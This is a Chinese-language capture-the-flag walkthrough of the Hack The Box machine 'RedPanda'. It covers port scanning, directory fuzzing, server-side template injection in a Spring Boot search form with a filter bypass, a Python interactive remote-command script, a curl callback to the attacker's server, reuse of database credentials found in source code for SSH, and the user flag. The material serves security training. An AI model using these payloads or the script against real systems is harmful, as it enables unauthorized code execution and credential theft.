Hackthebox - RedPanda

靶场信息

靶场类型

信息收集

Nmap

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.170

Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-23 09:15 CST
Nmap scan report for 10.10.11.170
Host is up (0.41s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 23 Oct 2022 01:16:00 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 23 Oct 2022 01:16:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 23 Oct 2022 01:16:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=10/23%Time=635495D0%P=arm-apple-darwin21.5.0%
SF:r(GetRequest,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;ch
SF:arset=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sun,\x2023\x20Oct
SF:\x202022\x2001:16:00\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x2
SF:0html>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"w
SF:ooden_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://co
SF:depen\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"sty
SF:lesheet\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x2
SF:0\x20<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"te
SF:xt/css\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\
SF:x20with\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\
SF:x20\x20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20
SF:class='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\
SF:x20right'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20le
SF:ft'>\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x
SF:20\x20\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x
SF:20</div>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x202
SF:00\x20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x
SF:20Sun,\x2023\x20Oct\x202022\x2001:16:01\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20t
SF:ext/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x2
SF:0435\r\nDate:\x20Sun,\x2023\x20Oct\x202022\x2001:16:02\x20GMT\r\nConnec
SF:tion:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><tit
SF:le>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><styl
SF:e\x20type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x
SF:20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20
SF:h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:
SF:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{h
SF:eight:1px;background-color:#525D76;border:none;}</style></head><body><h
SF:1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></
SF:html>");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/23%OT=22%CT=1%CU=40350%PV=Y%DS=2%DC=T%G=Y%TM=635496
OS:14%P=arm-apple-darwin21.5.0)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M53
OS:9ST11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%D
OS:F=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   537.83 ms 10.10.14.1
2   537.94 ms 10.10.11.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.28 seconds

Http

挺可爱一小熊猫,还会眨眼睛

在下面有个搜索框,随便搜点东西看看

看着交互界面,确实会去数据库进行交互查询,这种潜意识就觉得可能会有注入

没测试出什么东西,去 fuzz 试试吧

Fuzz

 lucifiel@MacBookPro  ~  ffuf -u 'http://10.10.11.170:8080/FUZZ' -w /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.170:8080/FUZZ
 :: Wordlist         : FUZZ: /Users/lucifiel/Documents/Penetration/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

stats                   [Status: 200, Size: 987, Words: 200, Lines: 33, Duration: 619ms]
error                   [Status: 500, Size: 86, Words: 1, Lines: 1, Duration: 617ms]
search                  [Status: 405, Size: 117, Words: 3, Lines: 1, Duration: 616ms]
                        [Status: 200, Size: 1543, Words: 368, Lines: 56, Duration: 401ms]
:: Progress: [30000/30000] :: Job [1/1] :: 8724 req/sec :: Duration: [0:00:41] :: Errors: 10271 ::

有一个 stats 目录,去看一下

这边发现了一些图片,去尝试读取试试

这里提示确实是有注入的,不过有一说一,这图片确实挺有意思的

不过既然 sql 注入不行,那就试试 ssti 呗,反正可以确定漏洞在于注入了

测试出来了 语法是 *{7*7},把 ssti 语句中的 $ 替换为 * 即可绕过

漏洞利用

我们通过 nmap 的扫描结果可得知,这个网站使用的是 Spring Boot,所以可以确定是一个 java 的程序

所以我们去 ssti 的利用语句里找一下

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty

*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false

成功读取到 /etc/passwd 文件

虽然可以了,但是转换格式还是有点麻烦,所以我又找到了一篇文章

https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/el-expression-language.md

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")}

直接执行似乎会提示错误,去开一个 http 服务试试

python3 -m http.server 80

然后改一下指令,来请求试试

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://10.10.14.2")}
 lucifiel@MacBookPro  ~  python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.11.170 - - [23/Oct/2022 10:02:07] "GET / HTTP/1.1" 200 -

直接搞个 rce 脚本吧

#!/usr/bin/python3
import requests
from cmd import Cmd
from bs4 import BeautifulSoup


print("""
 __          __    __       ______     __      _______     __      _______     __      
|  |        |  |  |  |     /      |   |  |    |   ____|   |  |    |   ____|   |  |     
|  |        |  |  |  |    |  ,----'   |  |    |  |__      |  |    |  |__      |  |     
|  |        |  |  |  |    |  |        |  |    |   __|     |  |    |   __|     |  |     
|  `----.   |  `--'  |    |  `----.   |  |    |  |        |  |    |  |____    |  `----.
|_______|    \______/      \______|   |__|    |__|        |__|    |_______|   |_______|

""")
class RCE(Cmd):
    prompt = "\033[1;31m$\033[1;37m "
    def decimal(self, args):
        comando = args
        decimales = []

        for i in comando:
            decimales.append(str(ord(i)))
        payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % decimales[0]

        for i in decimales[1:]:
            payload += ".concat(T(java.lang.Character).toString({}))".format(i)

        payload += ").getInputStream())}"
        data = { "name": payload }
        requer = requests.post("http://10.10.11.170:8080/search", data=data)
        parser = BeautifulSoup(requer.content, 'html.parser')
        grepcm = parser.find_all("h2")[0].get_text()
        result = grepcm.replace('You searched for:','').strip()
        print(result)

    def default(self, args):
        try:
            self.decimal(args)
        except:
            print("%s: command not found" % (args))

RCE().cmdloop()
 lucifiel@MacBookPro  ~/Desktop  python3 exploip.py

 __          __    __       ______     __      _______     __      _______     __
|  |        |  |  |  |     /      |   |  |    |   ____|   |  |    |   ____|   |  |
|  |        |  |  |  |    |  ,----'   |  |    |  |__      |  |    |  |__      |  |
|  |        |  |  |  |    |  |        |  |    |   __|     |  |    |   __|     |  |
|  `----.   |  `--'  |    |  `----.   |  |    |  |        |  |    |  |____    |  `----.
|_______|    \______/      \______|   |__|    |__|        |__|    |_______|   |_______|


$ whoami
woodenk
$ id
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)

可以成功执行,但是还是没有 shell 方便,先去看看有没有什么可以拿到 shell 的东西吧

在文件 /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java 中,找到了一段凭证

conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/red_panda", "woodenk", "RedPandazRule");
username = woodenk
password = RedPandazRule
 lucifiel@MacBookPro  ~/Desktop  ssh woodenk@10.10.11.170
woodenk@10.10.11.170's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-121-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 24 Oct 2022 03:15:10 AM UTC

  System load:           0.02
  Usage of /:            80.9% of 4.30GB
  Memory usage:          41%
  Swap usage:            0%
  Processes:             213
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.170
  IPv6 address for eth0: dead:beef::250:56ff:feb9:1c2


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Oct 24 03:14:58 2022 from 10.10.14.11
woodenk@redpanda:~$ whoami&&id
woodenk
uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk)

成功拿到 user 权限的 shell

woodenk@redpanda:~$ cat user.txt
a00d4342cd040f667d3dbfee34a49451

成功拿到 user 权限的 flag 文件